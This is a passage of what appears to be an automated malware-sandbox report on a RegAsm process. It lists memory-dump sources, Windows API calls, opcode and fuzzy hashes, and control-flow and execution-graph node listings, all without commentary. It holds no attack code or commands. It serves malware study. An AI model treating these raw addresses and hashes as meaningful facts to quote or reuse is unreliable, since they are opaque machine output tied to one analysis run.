                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012E680F
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2921136401.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_12e0000_RegAsm.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: befe6bfeda8103b61d39dbef3accc7696b24793a1f9e00d3d6d4d29949334843
                                    • Instruction ID: 474884fc10ca1cf2cbd8c33814daf7c3d74f0111f98b8d66698e4cc74a9c920f
                                    • Opcode Fuzzy Hash: befe6bfeda8103b61d39dbef3accc7696b24793a1f9e00d3d6d4d29949334843
                                    • Instruction Fuzzy Hash: 3021C4B59002599FDB10CF9AD984ADEBFF8EB48320F14841AE958A7310D374A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 713 12ec294-12ec8b8 715 12ec8ba-12ec8bd 713->715 716 12ec8c0-12ec8ef LoadLibraryExW 713->716 715->716 717 12ec8f8-12ec915 716->717 718 12ec8f1-12ec8f7 716->718 718->717
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,012EC6D1,00000800,00000000,00000000), ref: 012EC8E2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2921136401.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_12e0000_RegAsm.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 26f11727db25540aa587501faca59d5e7433869ddaa72dbc748a983205635a65
                                    • Instruction ID: 3c6c1cf76bce3f2b8070ff8e09964c012f13f1839d598cf1961009a155f2fba1
                                    • Opcode Fuzzy Hash: 26f11727db25540aa587501faca59d5e7433869ddaa72dbc748a983205635a65
                                    • Instruction Fuzzy Hash: 261126B6D003498FDB10CF9AD548ADEFBF4EB48320F10842AD519B7210C774A544CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 721 12ec870-12ec8b8 722 12ec8ba-12ec8bd 721->722 723 12ec8c0-12ec8ef LoadLibraryExW 721->723 722->723 724 12ec8f8-12ec915 723->724 725 12ec8f1-12ec8f7 723->725 725->724
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,012EC6D1,00000800,00000000,00000000), ref: 012EC8E2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2921136401.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_12e0000_RegAsm.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 842564f268af3c386d30163b8d1a04e329f0882aa8d0867fa21e548362a83810
                                    • Instruction ID: 7bb6537f325d6d849c337ae73232c395216791924195542f0aa10d4318b322d7
                                    • Opcode Fuzzy Hash: 842564f268af3c386d30163b8d1a04e329f0882aa8d0867fa21e548362a83810
                                    • Instruction Fuzzy Hash: DF11F3B6D003498FDB10CF9AC948ADEFBF4EB48320F14842AD619B7210C379A545CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 728 12ec1f0-12ec230 729 12ec238-12ec263 GetModuleHandleW 728->729 730 12ec232-12ec235 728->730 731 12ec26c-12ec280 729->731 732 12ec265-12ec26b 729->732 730->729 732->731
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 012EC256
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2921136401.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_12e0000_RegAsm.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: bb58f0f2b3c9b351e729a0a7ecc3b848fffca1e1cf3994723d64122d662ae8db
                                    • Instruction ID: aa00cb05cfd56d056bfee6691303e816580f78e87dddc5a79d78b6466f8e1768
                                    • Opcode Fuzzy Hash: bb58f0f2b3c9b351e729a0a7ecc3b848fffca1e1cf3994723d64122d662ae8db
                                    • Instruction Fuzzy Hash: 081110B6C003498FDB10DF9AC448ADEFBF4AB88324F10842AD529B7210C378A545CFA1
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2919198341.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_124d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4bdf82d709ee82633fe194f092c6a48691efb902216816c5ab5e726d8554f2a0
                                    • Instruction ID: a8d562fe613af3db2fda2ed03ec6258e98012c60a642ff965d652d7b2d77eb5f
                                    • Opcode Fuzzy Hash: 4bdf82d709ee82633fe194f092c6a48691efb902216816c5ab5e726d8554f2a0
                                    • Instruction Fuzzy Hash: C5212571510208DFDB09DF98E9C0B26BFA5FBA8318F24856DE9094B216C736D456CAE2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2919572096.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_125d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eadd51e4c3ad28037750ae158a8cf730d03495910c30635ccd1ffc1cde141622
                                    • Instruction ID: c84b23bdeb8a805df5e3cf4f3e6f60ca3edb6a2fc26b99f0373cbb1d9c1a23e9
                                    • Opcode Fuzzy Hash: eadd51e4c3ad28037750ae158a8cf730d03495910c30635ccd1ffc1cde141622
                                    • Instruction Fuzzy Hash: AE216170224208DFCB51DF68D9C0B26BFA1EB84314F20C96DDD0A4B356C37AD847CA62
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2919572096.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_125d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f2910809a49397ebf120cf121c5961bf400daadafaf1ef1be300ffe382859cbb
                                    • Instruction ID: b8802f0c90389fe909e4f7d62e7a3d5430f7189dbc86aaf74e68ecc0cbf6c6b0
                                    • Opcode Fuzzy Hash: f2910809a49397ebf120cf121c5961bf400daadafaf1ef1be300ffe382859cbb
                                    • Instruction Fuzzy Hash: FF21CA755083848FDB03CF24C9D0B15BF71EB46314F28C5EAC9498B2A3C33A980ACB62
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.2919198341.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_124d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ce69cba98bfff612cefda2c4877fe7df6cc59bd7a6ce96c012d28fad0f514114
                                    • Instruction ID: d2357d176662ca4ad2eac8c6575aebcd42bdcfbb7dfce5368f32bfb18556095a
                                    • Opcode Fuzzy Hash: ce69cba98bfff612cefda2c4877fe7df6cc59bd7a6ce96c012d28fad0f514114
                                    • Instruction Fuzzy Hash: B9110372404284CFCB16CF44D9C4B16BF71FB94318F24C6A9D9094B216C33AD45ACBE1

                                    Execution Graph

                                    Execution Coverage:4.1%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:1205
                                    Total number of Limit Nodes:2
                                    execution_graph 5553 7ff62b642dac 5556 7ff62b642db1 5553->5556 5557 7ff62b642e0d 5553->5557 5554 7ff62b642de0 realloc 5555 7ff62b642e28 ?_Xbad_alloc@std@ 5554->5555 5554->5556 5558 7ff62b642e30 5555->5558 5556->5554 5556->5557 5559 7ff62b64564c ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 5558->5559 5567 7ff62b642e81 5559->5567 5560 7ff62b642ed6 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 5563 7ff62b642e89 5560->5563 5564 7ff62b642ec8 5560->5564 5561 7ff62b642f37 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 5565 7ff62b642f56 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5561->5565 5566 7ff62b642f62 5561->5566 5562 7ff62b642ead ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5562->5564 5562->5567 5563->5561 5564->5561 5564->5563 5568 7ff62b642ef8 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5564->5568 5565->5566 5567->5560 5567->5562 5567->5563 5568->5563 5568->5564 5569 7ff62b64dcaf 5570 7ff62b64dcc2 5569->5570 5571 7ff62b64dccf 5569->5571 5573 7ff62b645cc4 5570->5573 5574 7ff62b645cd7 5573->5574 5575 7ff62b645cfb 5573->5575 5574->5575 5576 7ff62b645d19 _invalid_parameter_noinfo_noreturn 5574->5576 5575->5571 5577 7ff62b64afb0 5578 7ff62b64afc1 5577->5578 5578->5578 5579 7ff62b641d68 5 API calls 5578->5579 5580 7ff62b64afea 5579->5580 5581 7ff62b64b3b0 5582 7ff62b64b3d2 5581->5582 5584 7ff62b64b3fc 5581->5584 5583 7ff62b64b3eb ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXH 5582->5583 5582->5584 5583->5584 5585 7ff62b645498 __std_exception_copy 5678 7ff62b642918 5684 7ff62b64293b 5678->5684 5679 7ff62b642bd9 5680 7ff62b642bcf 5680->5679 5685 7ff62b64378c 5680->5685 5682 7ff62b64378c 11 API calls 5682->5684 5683 7ff62b642700 11 API calls 5683->5684 5684->5679 5684->5680 5684->5682 5684->5683 5686 7ff62b6438c6 5685->5686 5687 7ff62b6437cc 5685->5687 5714 7ff62b64a580 ?_Xlength_error@std@@YAXPEBD 5686->5714 5688 7ff62b6437e0 5687->5688 5691 7ff62b643822 5687->5691 5692 7ff62b641a70 2 API calls 5688->5692 5693 7ff62b64381d 5691->5693 5696 7ff62b64cc88 std::_Facet_Register malloc 5691->5696 5692->5693 5699 7ff62b64388f memmove 5693->5699 5700 7ff62b643844 memmove 5693->5700 5696->5693 5704 7ff62b64387b 5699->5704 5703 7ff62b643866 5700->5703 5700->5704 5703->5704 5706 7ff62b643888 _invalid_parameter_noinfo_noreturn 5703->5706 5704->5679 5706->5699 5586 7ff62b64e098 5587 7ff62b64e0cd __current_exception __current_exception_context terminate 5586->5587 5588 7ff62b64e0c1 5586->5588 5587->5588 5715 7ff62b642c20 5716 7ff62b642d4e 5715->5716 5717 7ff62b642c4d 5715->5717 5717->5716 5718 7ff62b64378c 11 API calls 5717->5718 5720 7ff62b642700 5717->5720 5718->5717 5721 7ff62b642769 5720->5721 5723 7ff62b642725 5720->5723 5721->5717 5722 7ff62b64378c 11 API calls 5722->5723 5723->5721 5723->5722 5725 7ff62b64dc1f 5732 7ff62b64a9c8 5725->5732 5733 7ff62b64a9e0 _invalid_parameter_noinfo_noreturn 5732->5733 5735 7ff62b646424 free ??1facet@locale@std@@MEAA 5736 7ff62b646455 5735->5736 5737 7ff62b646a24 5739 7ff62b646a52 5737->5739 5738 7ff62b646af6 5739->5738 5740 7ff62b64cc88 std::_Facet_Register malloc 5739->5740 5741 7ff62b646ab9 memset 5739->5741 5740->5739 5741->5739 5743 7ff62b646008 ?uncaught_exception@std@ 5744 7ff62b64601a ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5743->5744 5745 7ff62b646024 5743->5745 5744->5745 5746 7ff62b64dd07 ??1_Lockit@std@@QEAA 5593 7ff62b64d288 5594 7ff62b64d690 GetModuleHandleW 5593->5594 5595 7ff62b64d28f 5594->5595 5596 7ff62b64d2c9 _exit 5595->5596 5597 7ff62b64d293 5595->5597 5598 7ff62b64db8e ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5599 7ff62b646294 5602 7ff62b6458dc 5599->5602 5601 7ff62b6462a8 5603 7ff62b645924 5602->5603 5604 7ff62b645929 5603->5604 5605 7ff62b645908 free 5603->5605 5606 7ff62b645943 free 5604->5606 5607 7ff62b645957 5604->5607 5605->5603 5606->5607 5608 7ff62b645960 free 5607->5608 5609 7ff62b645975 5607->5609 5608->5609 5610 7ff62b64599c 5609->5610 5611 7ff62b64597b free 5609->5611 5610->5601 5611->5609 5752 7ff62b64e10f _seh_filter_exe 5612 7ff62b64d07c 5613 7ff62b64d08c 5612->5613 5625 7ff62b64cd54 5613->5625 5615 7ff62b64d4fc 9 API calls 5616 7ff62b64d131 5615->5616 5617 7ff62b64d0b0 _RTC_Initialize 5622 7ff62b64d113 5617->5622 5633 7ff62b64d980 InitializeSListHead 5617->5633 5622->5615 5624 7ff62b64d121 5622->5624 5626 7ff62b64cd97 5625->5626 5627 7ff62b64cd65 5625->5627 5626->5617 5628 7ff62b64cdd4 5627->5628 5631 7ff62b64cd6a __scrt_acquire_startup_lock 5627->5631 5629 7ff62b64d4fc 9 API calls 5628->5629 5630 7ff62b64cdde 5629->5630 5631->5626 5632 7ff62b64cd87 _initialize_onexit_table 5631->5632 5632->5626 5753 7ff62b64b1fc 5754 7ff62b64b229 5753->5754 5755 7ff62b64b224 5753->5755 5755->5754 5756 7ff62b64b267 5755->5756 5758 7ff62b64b24b ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5755->5758 5757 7ff62b64b29d 5756->5757 5759 7ff62b64b2b1 5756->5759 5760 7ff62b64cc88 std::_Facet_Register malloc 5757->5760 5761 7ff62b64b2aa memmove 5757->5761 5758->5754 5759->5754 5762 7ff62b641a70 2 API calls 5759->5762 5760->5761 5766 7ff62b64b305 5761->5766 5762->5761 5764 7ff62b64b376 ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5765 7ff62b64b38b _invalid_parameter_noinfo_noreturn 5764->5765 5765->5754 5766->5764 5766->5765 5767 7ff62b6457fc 5768 7ff62b64580e 5767->5768 5769 7ff62b645837 5767->5769 5768->5769 5770 7ff62b645854 _invalid_parameter_noinfo_noreturn 5768->5770 5771 7ff62b641000 5772 7ff62b641071 5771->5772 5772->5772 5815 7ff62b6451fc 5772->5815 5816 7ff62b64522f 5815->5816 5836 7ff62b644bec ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 5816->5836 5818 7ff62b64523c 5849 7ff62b644cc4 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 5818->5849 5820 7ff62b645248 5861 7ff62b6440cc 5820->5861 5837 7ff62b644c36 5836->5837 5838 7ff62b644ca4 ??1_Lockit@std@@QEAA 5837->5838 5839 7ff62b644c4d ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 5837->5839 5840 7ff62b644c58 5837->5840 5838->5818 5839->5840 5840->5838 5848 7ff62b644c6a 5840->5848 5868 7ff62b648f38 5840->5868 5843 7ff62b644cbd 5885 7ff62b649fe8 5843->5885 5844 7ff62b644c82 5882 7ff62b64c984 5844->5882 5848->5838 5850 7ff62b644d0f 5849->5850 5851 7ff62b644d83 ??1_Lockit@std@@QEAA 5850->5851 5852 7ff62b644d31 5850->5852 5853 7ff62b644d26 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 5850->5853 5851->5820 5852->5851 5854 7ff62b644d48 ?_Getcat@?$ctype@D@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 5852->5854 5853->5852 5855 7ff62b644d5c 5854->5855 5856 7ff62b644d9e 5854->5856 5857 7ff62b64c984 std::_Facet_Register malloc 5855->5857 5858 7ff62b649fe8 _CxxThrowException 5856->5858 5859 7ff62b644d6e 5857->5859 5860 7ff62b644da3 5858->5860 5859->5851 5900 7ff62b644f04 5861->5900 5863 7ff62b6440fd 5907 7ff62b64810c 5863->5907 5869 7ff62b64905a 5868->5869 5870 7ff62b648f6f 5868->5870 5871 7ff62b64d030 8 API calls 5869->5871 5870->5869 5872 7ff62b64cc88 std::_Facet_Register malloc 5870->5872 5873 7ff62b644c7c 5871->5873 5874 7ff62b648f80 5872->5874 5873->5843 5873->5844 5875 7ff62b648ff8 5874->5875 5888 7ff62b64b07c 5874->5888 5877 7ff62b649013 5875->5877 5878 7ff62b649004 ??1_Locinfo@std@@QEAA 5875->5878 5877->5869 5881 7ff62b649053 _invalid_parameter_noinfo_noreturn 5877->5881 5878->5877 5881->5869 5883 7ff62b64cc88 std::_Facet_Register malloc 5882->5883 5884 7ff62b64c997 5883->5884 5884->5848 5899 7ff62b6455bc 5885->5899 5887 7ff62b649ff6 _CxxThrowException 5889 7ff62b64b0b2 ?c_str@?$_Yarn@D@std@ 5888->5889 5893 7ff62b64b0e5 memmove 5888->5893 5891 7ff62b64b0cf 5889->5891 5891->5891 5892 7ff62b641d68 5 API calls 5891->5892 5892->5893 5895 7ff62b64b14f 5893->5895 5894 7ff62b64d030 8 API calls 5896 7ff62b648f9d ??0_Locinfo@std@@QEAA@PEBD ??0facet@locale@std@@IEAA@_K ?_Getcoll@_Locinfo@std@@QEBA?AU_Collvec@ 5894->5896 5897 7ff62b64b1c6 _invalid_parameter_noinfo_noreturn 5895->5897 5898 7ff62b64b1cd 5895->5898 5896->5875 5897->5898 5898->5894 5899->5887 5911 7ff62b641ffc 5900->5911 5903 7ff62b64a444 47 API calls 5904 7ff62b644f66 5903->5904 5926 7ff62b644da4 5904->5926 5906 7ff62b644f7a 5906->5863 5931 7ff62b64757c 5907->5931 5912 7ff62b642005 5911->5912 5925 7ff62b6420b1 5911->5925 5913 7ff62b6420c5 5912->5913 5914 7ff62b642034 5912->5914 5930 7ff62b64a594 ?_Xlength_error@std@@YAXPEBD 5913->5930 5915 7ff62b642045 5914->5915 5916 7ff62b642052 5914->5916 5918 7ff62b641a70 2 API calls 5915->5918 5920 7ff62b64cc88 std::_Facet_Register malloc 5916->5920 5921 7ff62b64204d 5916->5921 5918->5921 5920->5921 5929 7ff62b642f98 memcmp 5921->5929 5923 7ff62b645adc 4 API calls 5923->5925 5924 7ff62b64207a 5924->5923 5925->5903 5927 7ff62b64cc88 std::_Facet_Register malloc 5926->5927 5928 7ff62b644dc6 5927->5928 5928->5906 5929->5924 5932 7ff62b64cc88 std::_Facet_Register malloc 5931->5932 5933 7ff62b647595 5932->5933 5934 7ff62b6482d4 5933->5934 5935 7ff62b6482fc 5934->5935 5946 7ff62b6471a4 5935->5946 5937 7ff62b648327 5958 7ff62b6475e4 5937->5958 5939 7ff62b648371 5940 7ff62b64830b 5940->5937 5940->5939 5954 7ff62b648ce0 5940->5954 5942 7ff62b6471a4 47 API calls 5944 7ff62b648332 5942->5944 5944->5939 5944->5942 5945 7ff62b648ce0 malloc 5944->5945 5963 7ff62b648c20 5944->5963 5945->5944 5948 7ff62b6471b6 5946->5948 5947 7ff62b647331 5947->5940 5948->5947 5967 7ff62b646790 5948->5967 5978 7ff62b649c50 5948->5978 5987 7ff62b647374 5948->5987 5999 7ff62b647a70 5948->5999 6025 7ff62b64a4cc 5948->6025 5955 7ff62b648cfd 5954->5955 5956 7ff62b64cc88 std::_Facet_Register malloc 5955->5956 5957 7ff62b648d1d 5956->5957 5957->5937 5959 7ff62b64cc88 std::_Facet_Register malloc 5958->5959 5960 7ff62b647603 5959->5960 5961 7ff62b64cc88 std::_Facet_Register malloc 5960->5961 5962 7ff62b647648 5961->5962 5962->5944 5964 7ff62b648c56 5963->5964 5965 7ff62b64cc88 std::_Facet_Register malloc 5964->5965 5966 7ff62b648c6a 5965->5966 5966->5944 5968 7ff62b6467b4 5967->5968 5969 7ff62b6467bf 5968->5969 6037 7ff62b647140 5968->6037 5971 7ff62b6467c8 ?tolower@?$ctype@D@std@@QEBADD 5969->5971 5972 7ff62b6467db 5969->5972 5973 7ff62b6467f0 5971->5973 5972->5973 5974 7ff62b64b7e0 9 API calls 5972->5974 5975 7ff62b646816 5973->5975 5976 7ff62b646803 realloc 5973->5976 5974->5973 5975->5948 5976->5975 5977 7ff62b64683e ?_Xbad_alloc@std@ 5976->5977 5980 7ff62b649c7b 5978->5980 5981 7ff62b649c80 5978->5981 5979 7ff62b649d32 5979->5948 5980->5979 5980->5981 6040 7ff62b6482b0 5980->6040 5984 7ff62b649d4d 5981->5984 6043 7ff62b646e74 5981->6043 5985 7ff62b649cd5 5985->5981 5985->5984 5986 7ff62b6482b0 22 API calls 5985->5986 5986->5981 5988 7ff62b647389 5987->5988 5989 7ff62b6473fe 5987->5989 5991 7ff62b6482b0 22 API calls 5988->5991 6116 7ff62b647b74 5989->6116 5992 7ff62b647393 5991->5992 5992->5989 5993 7ff62b647397 5992->5993 5994 7ff62b6473a6 5993->5994 5997 7ff62b6473b2 5993->5997 5996 7ff62b6473f8 5994->5996 6123 7ff62b647ad8 5994->6123 5996->5948 5997->5996 6113 7ff62b646728 5997->6113 6000 7ff62b646994 malloc 5999->6000 6001 7ff62b647a89 6000->6001 6020 7ff62b647abb 6001->6020 6138 7ff62b64698c 6001->6138 6003 7ff62b647eec 6003->5948 6004 7ff62b64698c 3 API calls 6004->6020 6005 7ff62b647cb8 35 API calls 6005->6020 6006 7ff62b647ed5 6010 7ff62b64698c 3 API calls 6006->6010 6009 7ff62b647ef7 6011 7ff62b647f99 6009->6011 6015 7ff62b648003 Concurrency::cancel_current_task 6009->6015 6017 7ff62b647fc8 _invalid_parameter_noinfo_noreturn 6009->6017 6012 7ff62b647ee1 6010->6012 6014 7ff62b647fb1 6011->6014 6011->6015 6013 7ff62b64698c 3 API calls 6012->6013 6013->6003 6018 7ff62b647fcf 6014->6018 6019 7ff62b647fbe 6014->6019 6163 7ff62b64a594 ?_Xlength_error@std@@YAXPEBD 6015->6163 6017->6018 6022 7ff62b647fc6 6018->6022 6024 7ff62b64cc88 std::_Facet_Register malloc 6018->6024 6021 7ff62b641a70 2 API calls 6019->6021 6020->6003 6020->6004 6020->6005 6020->6006 6020->6009 6023 7ff62b64b7e0 9 API calls 6020->6023 6146 7ff62b646ccc 6020->6146 6021->6022 6022->5948 6023->6020 6024->6022 6026 7ff62b64a4ec 6025->6026 6027 7ff62b64a555 6026->6027 6028 7ff62b64a52d 6026->6028 6033 7ff62b64a4fa 6026->6033 6029 7ff62b64a536 6028->6029 6030 7ff62b64a540 6028->6030 6031 7ff62b6488c0 47 API calls 6029->6031 6032 7ff62b6483d0 47 API calls 6030->6032 6036 7ff62b64a51d 6030->6036 6031->6036 6032->6036 6033->6029 6034 7ff62b64a50e 6033->6034 6034->6027 6035 7ff62b64838c 47 API calls 6034->6035 6035->6036 6036->5948 6038 7ff62b64cc88 std::_Facet_Register malloc 6037->6038 6039 7ff62b647153 6038->6039 6062 7ff62b648550 6040->6062 6042 7ff62b6482c7 6042->5985 6044 7ff62b646ea8 6043->6044 6046 7ff62b646ec8 6043->6046 6045 7ff62b646790 13 API calls 6044->6045 6044->6046 6045->6046 6047 7ff62b647072 6046->6047 6048 7ff62b646ef1 6046->6048 6049 7ff62b64cc88 std::_Facet_Register malloc 6047->6049 6050 7ff62b64cc88 std::_Facet_Register malloc 6048->6050 6051 7ff62b64707c 6049->6051 6052 7ff62b646efb 6050->6052 6053 7ff62b64cc88 std::_Facet_Register malloc 6051->6053 6054 7ff62b64cc88 std::_Facet_Register malloc 6052->6054 6061 7ff62b646fe1 6053->6061 6055 7ff62b646f33 6054->6055 6056 7ff62b64cc88 std::_Facet_Register malloc 6055->6056 6057 7ff62b646f6f 6056->6057 6058 7ff62b64cc88 std::_Facet_Register malloc 6057->6058 6059 7ff62b646fab 6058->6059 6060 7ff62b64cc88 std::_Facet_Register malloc 6059->6060 6060->6061 6061->5979 6068 7ff62b648576 6062->6068 6063 7ff62b6486bb 6065 7ff62b6486d9 6063->6065 6066 7ff62b6486c0 6063->6066 6064 7ff62b648687 6072 7ff62b6448ac 6064->6072 6071 7ff62b6485dc 6065->6071 6089 7ff62b6469fc 6065->6089 6066->6071 6076 7ff62b646b24 6066->6076 6068->6063 6068->6064 6068->6071 6071->6042 6074 7ff62b644925 6072->6074 6075 7ff62b6448ed 6072->6075 6074->6071 6075->6074 6092 7ff62b644830 6075->6092 6096 7ff62b644a30 6076->6096 6078 7ff62b644a30 16 API calls 6086 7ff62b646b62 6078->6086 6079 7ff62b646ba3 memcmp 6079->6086 6080 7ff62b646c55 6083 7ff62b646c92 6080->6083 6088 7ff62b646c84 _invalid_parameter_noinfo_noreturn 6080->6088 6081 7ff62b646c8b _invalid_parameter_noinfo_noreturn 6081->6083 6082 7ff62b64cc88 std::_Facet_Register malloc 6082->6086 6084 7ff62b64d030 8 API calls 6083->6084 6085 7ff62b646ca3 6084->6085 6085->6071 6086->6078 6086->6079 6086->6080 6086->6081 6086->6082 6087 7ff62b646c18 memset 6086->6087 6087->6086 6088->6081 6109 7ff62b6479cc 6089->6109 6093 7ff62b644859 6092->6093 6094 7ff62b64488a 6092->6094 6093->6094 6095 7ff62b64485c ?tolower@?$ctype@D@std@@QEBADD ?tolower@?$ctype@D@std@@QEBADD 6093->6095 6094->6075 6095->6093 6095->6094 6097 7ff62b644a8b 6096->6097 6105 7ff62b644bc4 6096->6105 6099 7ff62b642254 _invalid_parameter_noinfo_noreturn memmove ?_Xlength_error@std@@YAXPEBD malloc 6097->6099 6098 7ff62b64d030 8 API calls 6101 7ff62b644bdb 6098->6101 6100 7ff62b644ab4 ?tolower@?$ctype@D@std@@QEBAPEBDPEADPEBD 6099->6100 6107 7ff62b644ae6 6100->6107 6101->6086 6102 7ff62b644b59 6104 7ff62b644b8e 6102->6104 6106 7ff62b644b87 _invalid_parameter_noinfo_noreturn 6102->6106 6103 7ff62b644b26 memmove 6103->6102 6104->6105 6108 7ff62b644bbd _invalid_parameter_noinfo_noreturn 6104->6108 6105->6098 6106->6104 6107->6102 6107->6103 6107->6106 6108->6105 6110 7ff62b6479fb 6109->6110 6111 7ff62b64cc88 std::_Facet_Register malloc 6110->6111 6112 7ff62b647a22 6110->6112 6111->6112 6114 7ff62b64cc88 std::_Facet_Register malloc 6113->6114 6115 7ff62b646741 6114->6115 6118 7ff62b647b8b 6116->6118 6120 7ff62b647bd6 6116->6120 6117 7ff62b647bc6 6117->6120 6132 7ff62b649c2c 6117->6132 6118->6117 6118->6120 6121 7ff62b647c2d 6118->6121 6120->5994 6129 7ff62b649090 6121->6129 6124 7ff62b647b2a 6123->6124 6125 7ff62b647afb 6123->6125 6124->5996 6126 7ff62b6448ac 2 API calls 6125->6126 6127 7ff62b647b14 6126->6127 6127->6124 6135 7ff62b646994 6127->6135 6130 7ff62b648550 22 API calls 6129->6130 6131 7ff62b6490ab 6130->6131 6131->6120 6133 7ff62b648550 22 API calls 6132->6133 6134 7ff62b649c42 6133->6134 6134->6120 6136 7ff62b64cc88 std::_Facet_Register malloc 6135->6136 6137 7ff62b6469a7 6136->6137 6139 7ff62b6468fc 6138->6139 6140 7ff62b64692b 6139->6140 6141 7ff62b64691a ?tolower@?$ctype@D@std@@QEBADD 6139->6141 6142 7ff62b64695d 6140->6142 6143 7ff62b64cc88 std::_Facet_Register malloc 6140->6143 6141->6140 6142->6020 6144 7ff62b646940 6143->6144 6144->6142 6145 7ff62b64694d memset 6144->6145 6145->6142 6147 7ff62b646cf4 ?tolower@?$ctype@D@std@@QEBADD ?tolower@?$ctype@D@std@@QEBADD 6146->6147 6149 7ff62b646d1a 6146->6149 6147->6149 6148 7ff62b646db4 6148->6020 6149->6148 6150 7ff62b64cc88 std::_Facet_Register malloc 6149->6150 6151 7ff62b646d8b 6149->6151 6154 7ff62b646d5b memset 6149->6154 6150->6149 6151->6148 6152 7ff62b646db9 6151->6152 6153 7ff62b646da3 6151->6153 6156 7ff62b64cc88 std::_Facet_Register malloc 6152->6156 6160 7ff62b646dca 6152->6160 6153->6148 6164 7ff62b646844 6153->6164 6154->6149 6156->6160 6157 7ff62b646df6 realloc 6158 7ff62b646e09 6157->6158 6161 7ff62b646e6e ?_Xbad_alloc@std@ 6157->6161 6158->6148 6159 7ff62b646e2a realloc 6158->6159 6159->6148 6162 7ff62b646e68 6159->6162 6160->6157 6160->6158 6162->6161 6165 7ff62b646878 6164->6165 6166 7ff62b646867 ?tolower@?$ctype@D@std@@QEBADD 6164->6166 6167 7ff62b64cc88 std::_Facet_Register malloc 6165->6167 6171 7ff62b64688d 6165->6171 6166->6165 6167->6171 6168 7ff62b6468b9 realloc 6169 7ff62b6468cc 6168->6169 6170 7ff62b6468f3 ?_Xbad_alloc@std@ 6168->6170 6169->6153 6171->6168 6171->6169 6198 7ff62b6465e8 __std_exception_destroy 6199 7ff62b64660f 6198->6199 6204 7ff62b64aff4 6212 7ff62b64c8d4 GetLocaleInfoEx FormatMessageA 6204->6212 6207 7ff62b64b023 memmove 6209 7ff62b64b059 LocalFree 6207->6209 6208 7ff62b64b041 6210 7ff62b641d68 5 API calls 6208->6210 6211 7ff62b64b058 6210->6211 6211->6209 6213 7ff62b64b010 6212->6213 6213->6207 6213->6208 6214 7ff62b64dfee ??1facet@locale@std@@MEAA 6215 7ff62b64ddf0 